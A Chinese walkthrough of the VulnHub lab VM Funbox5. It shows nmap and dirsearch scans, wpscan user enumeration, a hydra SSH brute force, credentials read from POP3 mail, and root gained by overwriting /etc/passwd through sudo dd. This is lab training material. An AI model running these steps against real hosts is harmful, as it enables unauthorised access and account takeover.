靶机渗透练习26-Funbox5-Next Level

靶机描述

靶机地址:https://www.vulnhub.com/entry/funbox-next-level,547/

Description

Lets separate the script-kids from script-teenies.

Hint: The first impression is not always the right one!

If you need hints, call me on twitter: @0815R2d2 Have fun…

This works better with VirtualBox rather than VMware

This works better with VirtualBox rather than VMware.

一、搭建靶机环境

攻击机Kali

IP地址:192.168.9.7

靶机

IP地址:192.168.9.44

注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)

该靶机环境搭建如下

  1. 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式
  2. 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only

二、实战

2.1网络扫描

2.1.1 启动靶机和Kali后进行扫描
方法一、arp-scan -I eth0 -l (指定网卡扫)

arp-scan -I eth0 -l

☁  kali  arp-scan -I eth0 -l                                                                                                                        
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.7
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.2     08:00:27:2a:3b:5b       PCS Systemtechnik GmbH
192.168.9.44    08:00:27:fe:0e:32       PCS Systemtechnik GmbH

2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.938 seconds (132.09 hosts/sec). 2 responded

方法二、masscan 扫描的网段 -p 扫描端口号

masscan 192.168.184.0/24 -p 80,22

方法三、netdiscover -i 网卡-r 网段

netdiscover -i eth0 -r 192.168.184.0/24

方法四、等你们补充
2.1.2 查看靶机开放的端口

使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口

☁  kali  nmap -A -sV -T4 -p- 192.168.9.44
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-15 16:37 CST
Nmap scan report for bogon (192.168.9.44)
Host is up (0.00035s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 af:ae:39:e2:da:bb:6f:1a:6b:04:ec:36:29:d9:0c:ea (RSA)
|   256 1d:d7:ef:2c:85:bf:0d:fc:e2:60:85:22:42:8d:cc:4d (ECDSA)
|_  256 a0:a4:6d:d9:ca:3e:71:a1:31:ea:a2:7e:42:63:13:74 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:FE:0E:32 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.35 ms bogon (192.168.9.44)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.01 seconds

22—ssh—OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)

80—http----Apache httpd 2.4.18 ((Ubuntu))

2.2枚举漏洞

2.2.1 22 端口分析

一般只能暴力破解,暂时没有合适的字典

2.2.2 80 端口分析

访问 80 端口

靶机渗透练习26-Funbox5-Next Level_第1张图片

查看源码,没有什么发现

扫描一下目录:dirsearch -u http://192.168.9.44

☁  kali  dirsearch -u http://192.168.9.44                                                                                              

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.9.44/_22-03-15_16-44-39.txt

Error Log: /root/.dirsearch/logs/errors-22-03-15_16-44-39.log

Target: http://192.168.9.44/

[16:44:39] Starting: 
[16:44:39] 403 -  277B  - /.ht_wsr.txt
[16:44:39] 403 -  277B  - /.htaccess.bak1
[16:44:39] 403 -  277B  - /.htaccess.orig
[16:44:39] 403 -  277B  - /.htaccess_extra
[16:44:39] 403 -  277B  - /.htaccess_orig
[16:44:39] 403 -  277B  - /.htaccess.sample
[16:44:39] 403 -  277B  - /.htaccess.save
[16:44:39] 403 -  277B  - /.htaccessBAK
[16:44:39] 403 -  277B  - /.htaccess_sc
[16:44:39] 403 -  277B  - /.htaccessOLD
[16:44:39] 403 -  277B  - /.htaccessOLD2
[16:44:39] 403 -  277B  - /.htm
[16:44:39] 403 -  277B  - /.html
[16:44:39] 403 -  277B  - /.htpasswd_test
[16:44:39] 403 -  277B  - /.httr-oauth
[16:44:39] 403 -  277B  - /.htpasswds
[16:44:40] 403 -  277B  - /.php
[16:44:40] 403 -  277B  - /.php3
[16:44:50] 301 -  313B  - /drupal  ->  http://192.168.9.44/drupal/
[16:44:52] 200 -   11KB - /index.html
[16:44:58] 200 -   16B  - /robots.txt
[16:44:59] 403 -  277B  - /server-status
[16:44:59] 403 -  277B  - /server-status/

Task Completed

发现目录drupal,这应该是drupal cms

访问:http://192.168.9.44/robots.txt

靶机渗透练习26-Funbox5-Next Level_第2张图片

发现Allow: Thinking

访问:http://192.168.9.44/drupal/

靶机渗透练习26-Funbox5-Next Level_第3张图片

发现会会被重定向到:https://192.168.178.33/drupal/

再扫描一下dirsearch -u http://192.168.9.44/drupal

☁  kali  dirsearch -u http://192.168.9.44/drupal

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.9.44/-drupal_22-03-15_16-54-04.txt

Error Log: /root/.dirsearch/logs/errors-22-03-15_16-54-04.log

Target: http://192.168.9.44/drupal/

[16:54:04] Starting: 
[16:54:05] 403 -  277B  - /drupal/.ht_wsr.txt
[16:54:05] 403 -  277B  - /drupal/.htaccess.sample
[16:54:05] 403 -  277B  - /drupal/.htaccess.orig
[16:54:05] 403 -  277B  - /drupal/.htaccess.save
[16:54:05] 403 -  277B  - /drupal/.htaccess_orig
[16:54:05] 403 -  277B  - /drupal/.htaccess.bak1
[16:54:05] 403 -  277B  - /drupal/.htaccess_sc
[16:54:05] 403 -  277B  - /drupal/.htaccessOLD
[16:54:05] 403 -  277B  - /drupal/.htaccessBAK
[16:54:05] 403 -  277B  - /drupal/.htaccess_extra
[16:54:05] 403 -  277B  - /drupal/.htaccessOLD2
[16:54:05] 403 -  277B  - /drupal/.htm
[16:54:05] 403 -  277B  - /drupal/.html
[16:54:05] 403 -  277B  - /drupal/.htpasswds
[16:54:05] 403 -  277B  - /drupal/.htpasswd_test
[16:54:05] 403 -  277B  - /drupal/.httr-oauth
[16:54:05] 403 -  277B  - /drupal/.php
[16:54:05] 403 -  277B  - /drupal/.php3
[16:54:19] 200 -   61KB - /drupal/index.php
[16:54:20] 200 -   19KB - /drupal/license.txt
[16:54:24] 200 -    7KB - /drupal/readme.html
[16:54:29] 301 -  322B  - /drupal/wp-admin  ->  http://192.168.9.44/drupal/wp-admin/
[16:54:29] 301 -  324B  - /drupal/wp-content  ->  http://192.168.9.44/drupal/wp-content/
[16:54:29] 200 -    0B  - /drupal/wp-content/
[16:54:29] 200 -    0B  - /drupal/wp-config.php
[16:54:29] 200 -   69B  - /drupal/wp-content/plugins/akismet/akismet.php
[16:54:29] 400 -    1B  - /drupal/wp-admin/admin-ajax.php
[16:54:29] 500 -    0B  - /drupal/wp-content/plugins/hello.php
[16:54:30] 200 -  797B  - /drupal/wp-content/upgrade/
[16:54:30] 200 -  987B  - /drupal/wp-content/uploads/
[16:54:30] 500 -    0B  - /drupal/wp-includes/rss-functions.php
[16:54:30] 301 -  325B  - /drupal/wp-includes  ->  http://192.168.9.44/drupal/wp-includes/
[16:54:30] 200 -    0B  - /drupal/wp-cron.php
[16:54:30] 200 -    6KB - /drupal/wp-login.php
[16:54:30] 302 -    0B  - /drupal/wp-signup.php  ->  http://192.168.178.33/drupal/wp-login.php?action=register
[16:54:30] 200 -   47KB - /drupal/wp-includes/
[16:54:30] 200 -    1KB - /drupal/wp-admin/install.php
[16:54:30] 409 -    3KB - /drupal/wp-admin/setup-config.php
[16:54:30] 302 -    0B  - /drupal/wp-admin/  ->  http://192.168.178.33/drupal/wp-login.php?redirect_to=http%3A%2F%2F192.168.9.44%2Fdrupal%2Fwp-admin%2F&reauth=1
[16:54:30] 405 -   42B  - /drupal/xmlrpc.php

Task Completed
☁  kali 

2.3漏洞利用

2.3.1 WordPress站常规方法getshell

由于扫描结果中存在 WordPress,利用 wpscan 进行扫描,发现两个用户

wpscan --url http://192.168.9.44/drupal/index.php --wp-content-dir=http://192.168.9.44/drupal/wp-content --enumerate u,p

[外链图片转存中…(img-Q2fM9vjU-1650249706700)]

由于无法访问 wp-admin,但是开放了 22 端口,尝试利用得到的两个用户名来爆破 ssh 登录密码

hydra -l ben -P /usr/share/wordlists/rockyou.txt -V 192.168.9.44 ssh

[外链图片转存中…(img-KbF6Ie2o-1650249706700)]

得到一组用户名和密码 ben:pookie,利用该凭据连接 ssh

☁  FunBox5  ssh [email protected]
The authenticity of host '192.168.9.44 (192.168.9.44)' can't be established.
ED25519 key fingerprint is SHA256:4lkUEnVJ8e8tWErWTlMuTZGW7/L9OPWmcqJlMVLFFGE.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.9.44' (ED25519) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-189-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


0 packages can be updated.
0 updates are security updates.


You have mail.
Last login: Tue Sep  1 22:14:28 2020 from 192.168.178.143
ben@funbox5:~$ id
uid=1001(ben) gid=1001(ben) groups=1001(ben),8(mail)
ben@funbox5:~$ 

2.4权限提升

2.4.1 信息收集

注意到 ben 用户在 mail 组中,但是不能直接使用 mail 命令进行查看,使用命令查看后台监听端口发现 110 端口

ben@funbox5:~$ mail
-bash: /usr/bin/mail: Permission denied
ben@funbox5:~$ netstat -antp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:587           0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:110             0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:143             0.0.0.0:*               LISTEN      -               
tcp        0      0 192.168.9.44:22         192.168.9.7:51808       ESTABLISHED -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               
tcp6       0      0 :::110                  :::*                    LISTEN      -               
tcp6       0      0 :::143                  :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -         

尝试连接到本地的 110 端口,用 ben 用户的信息凭据登录,发现三封邮件,在第三封邮件中发现了一组用户名和密码:adam:qwedsayxc!

ben@funbox5:~$ telnet 127.0.0.1 110
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
+OK Dovecot ready.
user ben
+OK
pass pookie
+OK Logged in.
list
+OK 3 messages:
1 403
2 391
3 578
.
retr 1
+OK 403 octets
Return-Path: <[email protected]>
Received: from funbox4 (localhost [127.0.0.1])
        by funbox5.fritz.box (8.15.2/8.15.2/Debian-3) with SMTP id 07VCk80g014898
        for ben@localhost; Mon, 31 Aug 2020 14:47:42 +0200
Date: Mon, 31 Aug 2020 14:46:08 +0200
From: [email protected]
Message-Id: <202008311247[email protected]>

Hi Ben,
are you going to Jonas' party on Saturday?
.
retr 2
+OK 391 octets
Return-Path: 
Received: from funbox4 (localhost [127.0.0.1])
        by funbox5.fritz.box (8.15.2/8.15.2/Debian-3) with SMTP id 07VCk80h014898
        for ben@localhost; Mon, 31 Aug 2020 14:54:40 +0200
Date: Mon, 31 Aug 2020 14:54:40 +0200
From: [email protected]
Message-Id: <[email protected]>

Hey Ben,

did you do all the updates?
.
retr 3
+OK 578 octets
Return-Path: 
Received: from funbox4 (localhost [127.0.0.1])
        by funbox5.fritz.box (8.15.2/8.15.2/Debian-3) with SMTP id 07VD43wQ015008
        for ben@localhost; Mon, 31 Aug 2020 15:04:40 +0200
Date: Mon, 31 Aug 2020 15:04:03 +0200
From: [email protected]
Message-Id: <[email protected]>

Hi Ben,

please come to my office at 10:00 a.m. We have a lot to talk about!
The new employees must be created. I've already finished Adam.
adam: qwedsayxc!

切换用户到 adam,查看 id 发现该用户在 sudo 组中,查看 sudo -l

ben@funbox5:~$ su adam
Password: 
adam@funbox5:/home/ben$ id
uid=1002(adam) gid=1002(adam) groups=1002(adam),27(sudo),1003(docker)
adam@funbox5:/home/ben$ sudo -l
[sudo] password for adam: 
Matching Defaults entries for adam on funbox5:
    env_reset

User adam may run the following commands on funbox5:
    (root) PASSWD: /bin/dd
    (root) PASSWD: /bin/de
    (root) PASSWD: /bin/df
adam@funbox5:/home/ben$ 

https://gtfobins.github.io/查询dddedf

靶机渗透练习26-Funbox5-Next Level_第4张图片

查询到dd可利用

2.4.2 sudo提权

靶机渗透练习26-Funbox5-Next Level_第5张图片

先使用 dd 命令将 /etc/passwd 复制到当前目录下

adam@funbox5:~$ ls -al
total 32
drwx------ 3 adam adam 4096 Sep  1  2020 .
drwxr-xr-x 5 root root 4096 Aug 31  2020 ..
-rw------- 1 adam adam   11 Sep  1  2020 .bash_history
-rw-r--r-- 1 adam adam  220 Aug 31  2020 .bash_logout
-rw-r--r-- 1 adam adam 3771 Aug 31  2020 .bashrc
drwx------ 2 adam adam 4096 Aug 31  2020 .cache
-rw-r--r-- 1 adam adam  655 Aug 31  2020 .profile
-rw-r--r-- 1 adam adam    0 Aug 31  2020 .sudo_as_admin_successful
-rw------- 1 adam adam  852 Sep  1  2020 .viminfo
adam@funbox5:~$ sudo /bin/dd if=/etc/passwd of=./passwd
3+1 records in
3+1 records out
2020 bytes (2.0 kB, 2.0 KiB) copied, 0.000224192 s, 9.0 MB/s
adam@funbox5:~$ ls -al
total 36
drwx------ 3 adam adam 4096 Mar 15 10:27 .
drwxr-xr-x 5 root root 4096 Aug 31  2020 ..
-rw------- 1 adam adam   11 Sep  1  2020 .bash_history
-rw-r--r-- 1 adam adam  220 Aug 31  2020 .bash_logout
-rw-r--r-- 1 adam adam 3771 Aug 31  2020 .bashrc
drwx------ 2 adam adam 4096 Aug 31  2020 .cache
-rw-r--r-- 1 root root 2020 Mar 15 10:27 passwd
-rw-r--r-- 1 adam adam  655 Aug 31  2020 .profile
-rw-r--r-- 1 adam adam    0 Aug 31  2020 .sudo_as_admin_successful
-rw------- 1 adam adam  852 Sep  1  2020 .viminfo

由于 adam 用户没有修改权限,所以将其下载到本地

☁  FunBox5  scp [email protected]:/home/adam/passwd ./
[email protected]'s password: 
passwd                                                   100% 2020     3.1MB/s   00:00
☁  FunBox5  cat passwd 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
postfix:x:111:117::/var/spool/postfix:/bin/false
dovecot:x:112:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:113:120:Dovecot login user,,,:/nonexistent:/bin/false
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin
maria:x:1000:1000:,,,:/home/maria:/bin/bash
ben:x:1001:1001:,,,:/home/ben:/bin/bash
smmta:x:115:123:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:116:124:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
adam:x:1002:1002:,,,:/home/adam:/bin/bash

生成一个以 root 为密码的密文,然后使用 root 身份进行修改

☁  FunBox5  mkpasswd -m sha-512 root
$6$QoX42cly5BuSvuON$tCVjJr7rZ.AW2MEsOkET.LDdgP/EkRoJXpsApB9Q2.pBXS7zy5FYW6COuYW0Xih5y5y060U83ZiKK1InV1eEY0
☁  FunBox5  gedit passwd            

** (gedit:287197): WARNING **: 17:34:04.833: Set document metadata failed: 不支持设置属性 metadata::gedit-spell-language

** (gedit:287197): WARNING **: 17:34:04.833: Set document metadata failed: 不支持设置属性 metadata::gedit-encoding

** (gedit:287197): WARNING **: 17:34:07.570: Set document metadata failed: 不支持设置属性 metadata::gedit-spell-language

** (gedit:287197): WARNING **: 17:34:07.571: Set document metadata failed: 不支持设置属性 metadata::gedit-encoding

** (gedit:287197): WARNING **: 17:34:09.408: Set document metadata failed: 不支持设置属性 metadata::gedit-position
☁  FunBox5  cat passwd 
root:$6$QoX42cly5BuSvuON$tCVjJr7rZ.AW2MEsOkET.LDdgP/EkRoJXpsApB9Q2.pBXS7zy5FYW6COuYW0Xih5y5y060U83ZiKK1InV1eEY0:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
postfix:x:111:117::/var/spool/postfix:/bin/false
dovecot:x:112:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:113:120:Dovecot login user,,,:/nonexistent:/bin/false
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin
maria:x:1000:1000:,,,:/home/maria:/bin/bash
ben:x:1001:1001:,,,:/home/ben:/bin/bash
smmta:x:115:123:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:116:124:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
adam:x:1002:1002:,,,:/home/adam:/bin/bash
☁  FunBox5  

将修改好的内容上传回去

☁  FunBox5  scp passwd [email protected]:/tmp      
[email protected]'s password: 
passwd                                                   100% 2125     4.8MB/s   00:00
☁  FunBox5 

再利用 dd 命令将 /etc/passwd 的内容替换成修改过后的内容

adam@funbox5:~$ sudo /bin/dd if=/tmp/passwd of=/etc/passwd
4+1 records in
4+1 records out
2125 bytes (2.1 kB, 2.1 KiB) copied, 0.000315389 s, 6.7 MB/s

切换到 root 用户,用 root 作为密码登录,成功拿到 root 权限

adam@funbox5:~$ su root
Password: 
root@funbox5:/home/adam# cd /root
root@funbox5:~# ls
flag.txt
root@funbox5:~# cat flag.txt
 _______           _                     ______                      _                       _ 
(_______)         | |                   |  ___ \             _      | |                     | |
 _____ _   _ ____ | | _   ___ _   _ _   | |   | | ____ _   _| |_    | |      ____ _   _ ____| |
|  ___) | | |  _ \| || \ / _ ( \ / |_)  | |   | |/ _  | \ / )  _)   | |     / _  ) | | / _  ) |
| |   | |_| | | | | |_) ) |_| ) X ( _   | |   | ( (/ / ) X (| |__   | |____( (/ / \ V ( (/ /| |
|_|    \____|_| |_|____/ \___(_/ \_|_)  |_|   |_|\____|_/ \_)\___)  |_______)____) \_/ \____)_|

Made with ❤ by @0815R2d2
Please, tweet me a screenshot on Twitter.
THX 4 playing this Funbox.
root@funbox5:~# 

总结

本靶机主要通过wpscanhydra工具getshell,最后sudo提权

  1. wpscan工具的使用
  2. hydra爆破ssh登录账户密码
  3. 本地连接110端口进行信息收集
  4. sudo提权—dd提权

你可能感兴趣的:(靶机渗透练习,web安全)